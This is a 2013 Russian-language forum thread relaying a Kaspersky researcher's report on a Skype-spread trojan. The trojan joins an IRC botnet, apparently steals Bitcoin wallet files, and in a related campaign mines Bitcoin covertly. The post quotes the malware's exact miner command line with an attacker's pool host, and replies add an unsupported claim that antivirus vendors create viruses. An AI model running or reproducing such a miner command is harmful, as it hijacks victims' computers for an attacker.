Все Тут Online

Все Тут Online (https://vsetutonline.com/forum/index.php)
-   Дискуссионный клуб форума (https://vsetutonline.com/forum/forumdisplay.php?f=689)
-   -   Новый skype-троян превращает компьютер в раба, добывающего Bitcoin (https://vsetutonline.com/forum/showthread.php?t=58027)

anatol1961 07.04.2013 17:19

Новый skype-троян превращает компьютер в раба, добывающего Bitcoin
 
В блоге Дмитрия Бестужева, эксперта «Лаборатории Касперского», несколько дней назад появилось сообщение о массированной компании по распространению в skype нового трояна. Пользователям рассылаются сообщения, предлагающие перейти по некой ссылке вида:

По состоянию на 4 апреля интенсивность перехода по ней составляла почти 3 клика в секунду, а общее число кликов — около 170к!
Большая часть жертв — из России и Украины:

http://habrastorage.org/storage2/207...b0dec745ad.png

Так же затронуты пользователи из Китая, Италии, Болгарии и Тайваня.
Сам троян написан на Visual Basic и так же способен распространяться через USB-накопители. После инфицирования, компьютер жертвы становится частью ботнета, используя для связи с командным сервером IRC протокол.
Кроме того, троян, похоже, ворует файл wallet.dat от Bitcoin кошелька:

В своём следующем посте, Дмитрий рассказал про аналогичную компанию, но распространяющую троян немного другого рода. Оказавшись на машине пользователя, он запускает команду:

bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX

Таким образом, заставляя ваш компьютер добывать биткоины для злоумышленника!
При этом, нагрузка на CPU значительно возрастает:

http://habrastorage.org/storage2/f05...d1be783368.png

Один из хабраюзеров писал о трояне со схожей функциональностью 2 года назад, но теперь, похоже, интернет захлёстывает новая волна зловредного ПО, так или иначе связанного c Bitcoin, вокруг которого последнее время и так немало шума.

plotnik220 07.04.2013 17:39

Цитата:

Сообщение от anatol1961 (Сообщение 162088)
эксперта «Лаборатории Касперского»,

Реклама двигатель торговли
Сами придумывают и сами продают антивирус. Без работы не когда не будут

Worldly-wise 07.04.2013 18:06

Цитата:

Сообщение от plotnik220 (Сообщение 162089)
Реклама двигатель торговли
Сами придумывают и сами продают антивирус. Без работы не когда не будут

Рацией надо пользоваться TalkForce ))

anatol1961 07.04.2013 18:43

Там ушей много. На самом деле существует туева хуча прогамм для ip телефонии , все не проконтролируют и не заразят. Skype сейчас просто популярен , но есть не такие раскрученные но не хуже.


Часовой пояс GMT +3, время: 16:21.

Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод: zCarot